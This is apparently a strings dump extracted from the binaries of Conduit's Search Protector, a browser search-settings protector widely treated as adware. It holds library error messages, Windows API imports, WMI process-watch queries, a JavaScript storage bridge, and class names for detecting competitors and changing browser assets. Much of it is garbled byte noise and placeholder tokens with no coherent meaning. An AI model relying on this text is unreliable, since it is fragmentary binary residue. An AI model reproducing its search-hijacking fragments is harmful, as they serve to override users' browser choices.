@`@'@/@%@3@`@$@/@7@.@
{{{$927}}}
{{{$926}}}
`%K%D%G%I%@%A%
{{{$862}}}
{{{$863}}}
E*E E1E E E1EeExExEeE E0E)E)E5E1E7E
D,D%D*D#D!D
D0D0D!D)D4D0DdD7D0DÖD0D
C&C%C"C6C/C7C
4D0D%D/D!D D2D!D6D
S6S!S%S6S!S
{{{$774}}}
{{{$775}}}
{{{$958}}}
{{{$957}}}
{{{$756}}}
{{{$755}}}
{{{$758}}}
{{{$757}}}
9!0!6*33
(22 3"3$8!!
22"3'8!1
22"0-%2(
==$<-< 7.;
==-<(7.>
==-<(7.2
=7.==='44='
!!8 1 7 2'
!!1 4 2"
>>'?.? 4-8
>>.? 4-=
>>.? 4-1
>4->>>$77>$
22 3:"3'8!1
22"3'8!=
22"06;"3$$
%<9.#0!:##
))0(!9(<#:*
))9(<#:&
))9 - 9(??
66/7.&7#<%5
66&7&7#<%9
99 8&7)8,3*:
99)8/3*6
93*9993*999#
  2*#;*>!8(
  ;*=!8$
 !8   !8   1
??&>/>)5,0
:OVZSdip`QjJgo`fqEE\DZKUDPOVFjkq`}qEES:!Mdkai`ESSdip`EOVEEEOVEES:!Hpqdgi`Mdkai`EUDSOVJgo`fqEEE6EE_
00)1/> 1%:#3
0:#00 1 1&:#?
)#:))9(9(<#:&
;9$5& 91:
''>&7&1-4!
''7&2-4$
8:'6%#:29#
((1)8)>";.
((8)="; 
(";(((";(((2
:OVZFjhupq`QmlvEE\D:DSSdip`EOVEEUDPOVFjkq`}qEEUDS47EE_
<='2:=6!
00)18 1%:#3
00 1%:#?
:OVZ@kq`wFjhudwqh`kqEE\DUDPOVFjhudwqh`kqEEUDPOVFjkq`}qEEUDSOVJgo`fqEEE_
*(5*   1
9!(0!5*3#
$$=%4%2.77
$$4%1.7'
$.7$$$.7$$$>
'RKG\}~qv}Hjwh}jlaXXAYGVHYMRK[wvl}`lXXHYNRKWzr}{lXXHZ\NNytm}XRKXXH.YGV(N' [7[.[<[2[5[
[.[([>[)[
[.[5[2[5[([/[:[7[7[>[?[
]2];])]*]<]/]8]
]0]<]/])]
5@.@)@.@3@4@!@,@,@
@4@9@0@%@
spx.params
spx.assets
*_1_6_1_,_ _>_3_3_
4@2@5@%@
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
sql text
3.7.16
CREATE TEMP TABLE sqlite_temp_master(
{{{$101}}}
{{{$105}}}
{{{$106}}}
{{{$107}}}
{{{$108}}}
{{{$102}}}
{{{$103}}}
{{{$104}}}
{{{$113}}}
{{{$109}}}
{{{$110}}}
{{{$111}}}
{{{$112}}}
{{{$100}}}
{{{$116}}}
{{{$117}}}
{{{$114}}}
{{{$115}}}
{{{$120}}}
{{{$121}}}
{{{$118}}}
{{{$119}}}
{{{$122}}}
{{{$123}}}
{{{$537}}}
{{{$538}}}
{{{$524}}}
{{{$525}}}
{{{$526}}}
{{{$527}}}
{{{$528}}}
{{{$533}}}
{{{$534}}}
{{{$536}}}
{{{$529}}}
{{{$530}}}
{{{$531}}}
{{{$532}}}
{{{$237}}}
{{{$238}}}
{{{$561}}}
{{{$560}}}
{{{$564}}}
{{{$565}}}
{{{$566}}}
{{{$562}}}
{{{$563}}}
{{{$568}}}
{{{$569}}}
{{{$570}}}
{{{$571}}}
{{{$567}}}
{{{$573}}}
{{{$574}}}
{{{$575}}}
{{{$572}}}
{{{$577}}}
{{{$578}}}
{{{$576}}}
{{{$580}}}
{{{$579}}}
{{{$583}}}
{{{$581}}}
{{{$582}}}
{{{$586}}}
{{{$587}}}
{{{$584}}}
{{{$590}}}
{{{$589}}}
{{{$593}}}
{{{$591}}}
{{{$592}}}
{{{$595}}}
{{{$596}}}
{{{$594}}}
{{{$598}}}
{{{$597}}}
{{{$601}}}
{{{$599}}}
{{{$600}}}
{{{$603}}}
{{{$604}}}
{{{$602}}}
{{{$606}}}
{{{$605}}}
c%W%J%H%l%K%V%Q%D%I%I%
D%D/D!D D2D!D6D
DÐD%D
{{{$505}}}
{{{$509}}}
{{{$506}}}
{{{$507}}}
{{{$508}}}
{{{$510}}}
{{{$513}}}
{{{$511}}}
{{{$512}}}
{{{$514}}}
{{{$515}}}
{{{$516}}}
{{{$517}}}
{{{$518}}}
{{{$519}}}
{{{$520}}}
{{{$521}}}
{{{$522}}}
{{{$523}}}
4|7|?|?|
{{{$613}}}
{{{$614}}}
{{{$609}}}
{{{$610}}}
{{{$611}}}
{{{$612}}}
{{{$717}}}
{{{$719}}}
{{{$718}}}
{{{$720}}}
{{{$724}}}
{{{$722}}}
{{{$721}}}
{{{$723}}}
{{{$725}}}
{{{$726}}}
{{{$728}}}
{{{$727}}}
{{{$730}}}
{{{$729}}}
{{{$731}}}
{{{$735}}}
{{{$734}}}
{{{$733}}}
{{{$732}}}
{{{$742}}}
{{{$744}}}
{{{$743}}}
{{{$746}}}
{{{$747}}}
{{{$638}}}
{{{$643}}}
{{{$640}}}
{{{$639}}}
{{{$642}}}
{{{$641}}}
00:00:00.
1.1.3
gen_codes: max_code %d
code %d bits %d->%d
bl code -
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
{{{$141}}}
{{{$140}}}
{{{$139}}}
{{{$138}}}
{{{$146}}}
{{{$145}}}
{{{$142}}}
{{{$144}}}
{{{$143}}}
{{{$128}}}
{{{$127}}}
{{{$130}}}
{{{$129}}}
{{{$124}}}
{{{$126}}}
{{{$125}}}
{{{$132}}}
{{{$131}}}
{{{$134}}}
{{{$133}}}
{{{$135}}}
boost::too_many_args: format-string referred to less arguments than were passed
boost::too_few_args: format-string referred to more arguments than were passed
Union operator has to be applied to node sets
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Conduit::SearchProtector::Utils::Singleton::GetInstance
invalid map key
%s[%d]: %s
SQLITE_OK
SQLITE_INTERNAL
SQLITE_ERROR
SQLITE_ABORT
SQLITE_PERM
SQLITE_LOCKED
SQLITE_BUSY
SQLITE_READONLY
SQLITE_NOMEM
SQLITE_IOERR
SQLITE_INTERRUPT
SQLITE_NOTFOUND
SQLITE_CORRUPT
SQLITE_CANTOPEN
SQLITE_FULL
SQLITE_EMPTY
SQLITE_PROTOCOL
SQLITE_TOOBIG
SQLITE_SCHEMA
SQLITE_MISMATCH
SQLITE_CONSTRAINT
SQLITE_NOLFS
SQLITE_MISUSE
SQLITE_FORMAT
SQLITE_AUTH
SQLITE_ROW
SQLITE_RANGE
CPPSQLITE_ERROR
SQLITE_DONE
SQLITE_
d:d:d
d-d-d d:d:d
d-d-d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
API call with %s database connection pointer
922337203685477580
RowKey
GetProcessHeap
OsError 0x%x (%u)
delayed %dms for lock/sharing conflict
os_win.c:%d: (%d) %s(%s) - %s
%s-shm
%s\etilqs_
%s\%s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
2nd reference to page %d
invalid page number %d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
Page %d:
freelist leaf count too big on page %d
btreeInitPage() returns error code %d
unable to get the page. error code=%d
On tree page %d cell %d:
On page %d at right child:
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
unknown database %s
keyinfo(%d
%s(%d)
MJ delete: %s
%s-mjXXXXXX9XXz
-mjX9X
MJ collide: %s
foreign key constraint failed
bind on a busy prepared statement: [%s]
unable to use function %s in the requested context
zeroblob(%d)
constraint failed at %d in [%s]
abort at %d in [%s]: %s
no such savepoint: %s
cannot open savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
sqlite_master
sqlite_temp_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
database table is locked: %s
cannot change %s wal mode from within a transaction
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open view: %s
cannot open virtual table: %s
foreign key
no such column: "%s"
cannot open %s column for writing
indexed
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s
%s: %s.%s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
variable number must be between ?1 and ?%d
Expression tree is too large (maximum depth %d)
too many columns in %s
too many SQL variables
misuse of aggregate: %s()
EXECUTE %s%s SUBQUERY %d
%s%.*s"%w"
%.*s"%w"%s
sqlite_rename_trigger
sqlite_rename_table
sqlite_rename_parent
type='trigger' AND (%s)
%s OR name=%Q
sqlite_
there is already another table or index with this name: %s
table %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
sqlite_sequence
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_stat1
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
invalid name: "%s"
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
too many attached databases - max %d
database %s is already in use
unable to open database: %s
cannot detach database %s
no such database: %s
database %s is locked
sqlite_attach
sqlite_detach
%s %T cannot reference objects in database %s
access to %s.%s is prohibited
access to %s.%s.%s is prohibited
object name reserved for internal use: %s
too many columns on %s
there is already an index named %s
default value of column [%s] is not constant
duplicate column name: %s
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
view %s is circularly defined
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
sqlite_stat%d
sqlite_stat
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
use DROP TABLE to delete table %s
table %s may not be dropped
foreign key on %s should reference only one column of table %T
use DROP VIEW to delete view %s
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
indexed columns are not unique
table %s may not be indexed
virtual tables may not be indexed
views may not be indexed
index %s already exists
there is already a table named %s
table %s has no column named %s
sqlite_autoindex_%s_%d
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
no such collation sequence: %s
cannot modify %s because it is a view
sqlite_version
sqlite_log
sqlite_source_id
sqlite_compileoption_get
sqlite_compileoption_used
foreign key mismatch - "%w" referencing "%w"
%d values for %d columns
table %S has %d columns but %d values were supplied
table %S has no column named %s
constraint %s failed
%s.%s may not be NULL
PRIMARY KEY must be unique
unable to open shared library [%s]
sqlite3_extension_init
error during initialization: %s
no entry point [%s] in shared library [%s]
automatic extension loading failed: %s
foreign_keys
foreign_key_list
foreign_key_check
*** in database %s ***
unsupported encoding: %s
%s - %s
malformed database schema (%s)
unsupported file format
database schema is locked: %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
RIGHT and FULL OUTER JOINs are not currently supported
unknown or unsupported join type: %T %T%s%T
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
%s.%s
COMPOUND SUBQUERIES %d AND %d %s(%s)
ORDER BY clause should come after %s not before
%s:%d
LIMIT clause should come after %s not before
no such index: %s
SELECTs to the left and right of %s do not have the same number of result columns
too many references to "%s": max 65535
sqlite_subquery_%p_
no such table: %s
%s.%s.%s
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
cannot create INSTEAD OF trigger on table: %S
no such trigger: %S
no such column: %s
-- TRIGGER %s
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor did not declare schema: %s
vtable constructor failed: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s SUBQUERY %d
%s AS %s
%s USING %s%sINDEX%s%s%s
%s (rowid=?)
%s USING INTEGER PRIMARY KEY
%s (rowid>?)
%s (rowid>? AND rowid%s VIRTUAL TABLE INDEX %d:%s
%s (rowidat most %d tables in a join
%s (~%lld rows)
cannot use index: %s
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
unknown operation
large file support is disabled
unknown database: %s
%s mode not allowed: %s
no such %s mode: %s
no such vfs: %s
database corruption at line %d of [%.10s]
cannot open file at line %d of [%.10s]
misuse at line %d of [%.10s]
D*D7D0D%D(D(D
DÐD!D
D!D0D0D-D*D#DdD7D!D6D2D-D'D!DdD"D%D-D(D!D DjDdD
{{{$703}}}
{{{$704}}}
{{{$705}}}
{{{$137}}}
C:\Builds\113\Search Protector\SP-2.16.10-Production\Sources\SearchProtector\Dev\2.16.10\Output\Release_32\cltmng.pdb
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
VERSION.dll
PSAPI.DLL
InternetCrackUrlW
HttpOpenRequestA
HttpAddRequestHeadersA
HttpSendRequestW
HttpSendRequestA
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoA
WININET.dll
dbghelp.dll
CryptMsgClose
CertGetNameStringW
CertFreeCertificateContext
CertFindCertificateInStore
CertCloseStore
CryptMsgGetParam
CRYPT32.dll
UrlUnescapeW
SHLWAPI.dll
CreateIoCompletionPort
GetCPInfo
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegCreateKeyExW
RegQueryInfoKeyW
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
ReportEventA
I_RpcBindingInqTransportType
RPCRT4.dll
zcÁ
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect
function k(a) { return a < 10 ? "0"   a : a } function o(a) { p.lastIndex = 0; return p.test(a) ? '"'   a.replace(p, function (a) { var c = r[a]; return typeof c === "string" ? c : "\\u"   ("0000"   a.charCodeAt(0).toString(16)).slice(-4) })   '"' : '"'   a   '"' } function l(a, j) {
var c, d, h, m, g = e, f, b = j[a]; b && typeof b === "object" && typeof b.toJSON === "function" && (b = b.toJSON(a)); typeof i === "function" && (b = i.call(j, a, b)); switch (typeof b) {
e  = n; f = []; if (Object.prototype.toString.apply(b) === "[object Array]") { m = b.length; for (c = 0; c < m; c  = 1) f[c] = l(c, b) || "null"; h = f.length === 0 ? "[]" : e ? "[\n"   e   f.join(",\n"   e)   "\n"   g   "]" : "["   f.join(",")   "]"; e = g; return h } if (i && typeof i === "object") { m = i.length; for (c = 0; c < m; c  = 1) typeof i[c] === "string" && (d = i[c], (h = l(d, b)) && f.push(o(d)   (e ? ": " : ":")   h)) } else for (d in b) Object.prototype.hasOwnProperty.call(b, d) && (h = l(d, b)) && f.push(o(d)   (e ? ": " : ":")   h); h = f.length === 0 ? "{}" : e ? "{\n"   e   f.join(",\n"   e)   "\n"   g   "}" : "{"   f.join(",")  
} if (typeof Date.prototype.toJSON !== "function") Date.prototype.toJSON = function () { return isFinite(this.valueOf()) ? this.getUTCFullYear()   "-"   k(this.getUTCMonth()   1)   "-"   k(this.getUTCDate())   "T"   k(this.getUTCHours())   ":"   k(this.getUTCMinutes())   ":"   k(this.getUTCSeconds())   "Z" : null }, String.prototype.toJSON = Number.prototype.toJSON = Boolean.prototype.toJSON = function () { return this.valueOf() }; var q = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
p = /[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g, e, n, r = { "\u0008": "\\b", "\t": "\\t", "\n": "\\n", "\u000c": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\" }, i; if (typeof JSON.stringify !== "function") JSON.stringify = function (a, j, c) {
var d; n = e = ""; if (typeof c === "number") for (d = 0; d < c; d  = 1) n  = " "; else typeof c === "string" && (n = c); if ((i = j) && typeof j !== "function" && (typeof j !== "object" || typeof j.length !== "number")) throw Error("JSON.stringify"); return l("",
}; if (typeof JSON.parse !== "function") JSON.parse = function (a, e) {
function c(a, d) { var g, f, b = a[d]; if (b && typeof b === "object") for (g in b) Object.prototype.hasOwnProperty.call(b, g) && (f = c(b, g), f !== void 0 ? b[g] = f : delete b[g]); return e.call(a, d, b) } var d, a = String(a); q.lastIndex = 0; q.test(a) && (a = a.replace(q, function (a) { return "\\u"   ("0000"   a.charCodeAt(0).toString(16)).slice(-4) })); if (/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, "@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g,
"]").replace(/(?:^|:|,)(?:\s*\[) /g, ""))) return d = eval("("   a   ")"), typeof e === "function" ? c({ "": d }, "") : d; throw new SyntaxError("JSON.parse");
ws.api = ws.api || {};
ws.api.FunctionsEnum = {
SET_KEY: 1,
GET_KEY: 2,
REMOVE_KEY: 3,
ws.api.StatusEnum = {
SP_RESULT_KEY_DOES_NOT_EXIST: -2,
ws.api.RESULT_TIMOUET = 3000;
ws.api.storage = ws.api.storage || {};
ws.api.storage.setKey =
function (pluginId, key, value, callback, options) {
if (typeof (pluginId) !== 'string' || pluginId === "" || typeof (key) !== 'string' || key === "" || typeof (callback) !== 'function') {
callback(ws.api.StatusEnum.SP_RESULT_INVALID_PARAMS);
// Construct an object which will be passed to the VC holding all the parameters
data.funcId = ws.api.FunctionsEnum.SET_KEY;
data.pluginId = pluginId;
data.key = key;
data.value = value;
data.options = options; // Currently not used - this is for future use, if we will want to add more parameters we will
var resultObj = JSON.parse(result);
callback(resultObj.status);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE);
}, ws.api.RESULT_TIMOUET);
ws.internal.SendStringToVC(JSON.stringify(data), myCallback);
ws.api.storage.getKey =
function (pluginId, key, callback, options) {
data.funcId = ws.api.FunctionsEnum.GET_KEY;
var value = resultObj.value;
if (resultObj.status != ws.api.StatusEnum.SP_RESULT_SUCCESS) {
callback(resultObj.status, value);
callback(ws.api.StatusEnum.SP_RESULT_SP_UNRESPONSIVE, "");
ws.api.storage.removeKey =
data.funcId = ws.api.FunctionsEnum.REMOVE_KEY;
ws.api.system = ws.api.system || {};
ws.api.system.remove =
data.funcId = ws.api.FunctionsEnum.REMOVE;
data.shouldCallUninstaller = shouldCallUninstaller;
ws.internal = ws.internal || {};
if (ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID === undefined) {
ws.internal.injectedSP_PLUGIN_ID_SP_TASK_ID = true;
;74/, (%#
~{xrpfa\ZSM@;3-%U
; ;$;(;,;0;4;8;<;
7 7$7(7,707
0$0(020\0
1%2s2
14282<2@2
7%7S7Z7c7l7
5m6
5 5$5(5,505
343C3R3a3p3
0%0,070\0
67w7
;#;3;~;,<
0 0$0(0,00040;0
6 6$6(6,6064638
5#707 9-9
>$>)?=?\?
6m6
8Œ8S8Z8r8x899=:
6g6X6
0-0A0U0i0}0
7y7S7m7
8œ9
3&363 424
? ?$?(?,?0?
9(:,:0:4:8:<:
>$?,?4?6 6$6(6,6064686<6
0 0$0(0,0004080<0
1 1$1(1,10141
2#2X2
7|8U8
3#545&686
= =$=(=,=0=4=
353F3O3Z3o3}3
9$9-999E9Q9t9}9
5_5
2-2P2}2
0%1U1
1!292?2
9 9$9(949
7 7$707@7
= =(=\=`=
>$>(>,>0>4>8><>
9 9(90989
< <$<(<,<0<
= =$=(=,=
9 9$9(9,9|;
? ?(?4?\?
mmscoree.dll
nkernel32.dll
combase.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
8.0.0.0-11.999.999.999
33.0.0.0-36.999.999.999
16.0.0.0-31.999.999.999
{{{$663}}}
{{{$664}}}
{{{$665}}}
{{{$666}}}
2.16.10.61
UserRepository.dat
SystemRepository.dat
UIRepository.dat
_0.localstorage
chrome-extension_
{{{$251}}}
{{{$252}}}
{{{$254}}}
{{{$255}}}
36.0.0.0
32.0.0.0
{{{$291}}}
{{{$290}}}
{{{$294}}}
{{{$293}}}
{{{$297}}}
{{{$296}}}
kFailed to set Url
{{{$303}}}
{{{$304}}}
{{{$306}}}
{{{$307}}}
{{{$305}}}
{{{$310}}}
{{{$309}}}
{{{$317}}}
{{{$316}}}
{{{$322}}}
{{{$321}}}
{{{$325}}}
{{{$330}}}
{{{$329}}}
{{{$333}}}
{{{$332}}}
{{{$345}}}
{{{$344}}}
{{{$350}}}
{{{$351}}}
{{{$354}}}
{{{$355}}}
{{{$378}}}
{{{$380}}}
{{{$381}}}
{{{$367}}}
{{{$366}}}
Yuser32.dll
ieframe.dll
Windows Server 2008
Windows Vista
Windows Server 2008 R2
Windows 7
Windows Server 2012
Windows 8
Windows 8.1
%x %x[%s] %I64x %x %x
HKEY_CLASSES_ROOT
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER_LOCAL_SETTINGS
ntdll.dll
{{{$698}}}
{{{$697}}}
{{{$868}}}
{{{SP#Conduit::SearchProtector::SPM::SPMAssetsManager::MapAssets#SP}}}
{{{$888}}}
{{{SP#Conduit::SearchProtector::SPM::SPMAssetsManager::ExecuteAssetChangeAttemptDecision#SP}}}
SPSetup.exe
{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::CheckForCompetitors#SP}}}
{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::RequestService#SP}}}
{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::RequestServiceByBrowser#SP}}}
{{{SP#Conduit::SearchProtector::SPM::Services::LoginManager::HttpAsyncCallBack#SP}}}
http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Plugin Id: %s, Plugin Name: %s, Plugin version: %s
chrome.exe
%s\script_%d.dat
888816666554443
6666554443
!6666554443
{{{$535}}}
{{{$371}}}
{{{$372}}}
{{{$373}}}
{{{$368}}}
{{{$369}}}
{{{$370}}}
{{{$374}}}
{{{$607}}}
{{{$548}}}
{{{$549}}}
{{{$707}}}
{{{SP#Conduit::SearchProtector::Utils::WMIAgentJob::Join#SP}}}
{{{$715}}}
SELECT * FROM __InstanceCreationEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
SELECT * FROM __InstanceDeletionEvent WITHIN %1% WHERE TargetInstance ISA 'Win32_Process' And TargetInstance.Name = '%2%'
%s%s%s
Correct password required
IDispatch error #%d
{{{$625}}}
[%s\%s.exe
01234567
{{{SP#Conduit::SearchProtector::Application::Services::ServiceManager::HttpAsyncCallBack#SP}}}
UserSettings.dat
{{{SP#Conduit::SearchProtector::Application::Services::ServiceHandler::HttpAsyncCallBack#SP}}}
e8.0.0.0-11.999.999.999
{{{$77}}}
{{{SP#Conduit::SearchProtector::Application::Services::TimerBasedServiceHandler::HttpAsyncCallBack#SP}}}
iRpcTransportException
C:\PROGRA~1\SearchProtect\SearchProtect\bin\cltmng.exe

cltmngui.exe_1296:


.text
`.rdata
@.data
.rsrc
@.reloc
.EKSWU
\$$;\$0|
DlSHA512 block transform for x86, CRYPTOGAMS by 
Camellia for x86 by 
AES for Intel AES-NI, CRYPTOGAMS by 
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by 
RC4 for x86, CRYPTOGAMS by 
Montgomery Multiplication for x86, CRYPTOGAMS by 
SHA1 block transform for x86, CRYPTOGAMS by 
SHA256 block transform for x86, CRYPTOGAMS by 
GHASH for x86, CRYPTOGAMS by 
GF(2^m) Multiplication for x86, CRYPTOGAMS by 
FtPS
[email protected]
tcPVWQ
<1%u5
FTPj
tCPQ
,4,56,789
PSSSSSSh
j.Yf;
_tcPVj@
.PjRW
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
0123456789-
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%d / %m / %y
kernel32.dll
left-curly-bracket
right-curly-bracket
boost thread: trying joining itself
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
Visual C   CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
GetProcessWindowStation
operator
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
PUBLIC KEY
RSA part of OpenSSL 1.0.1e 11 Feb 2013
SHA-512 part of OpenSSL 1.0.1e 11 Feb 2013
ssl_sess_cert
ssl_cert
evp_pkey
x509_pkey
%s(%d): OpenSSL internal error, assertion failed: %s
passed a null parameter
DSO support routines
x509 certificate routines
error:lX:%s:%s:%s
?456789:;<=
!"#$%&'()* ,-./0123
Big Number part of OpenSSL 1.0.1e 11 Feb 2013
pubkey
PEM part of OpenSSL 1.0.1e 11 Feb 2013
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ENCRYPTED PRIVATE KEY
ANY PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
X509_PUBKEY
public_key
.\crypto\asn1\x_pubkey.c
DSA part of OpenSSL 1.0.1e 11 Feb 2013
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
Any Extended Key Usage
anyExtendedKeyUsage
supportedAlgorithms
crossCertificatePair
certificateRevocationList
cACertificate
userCertificate
userPassword
supportedApplicationContext
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
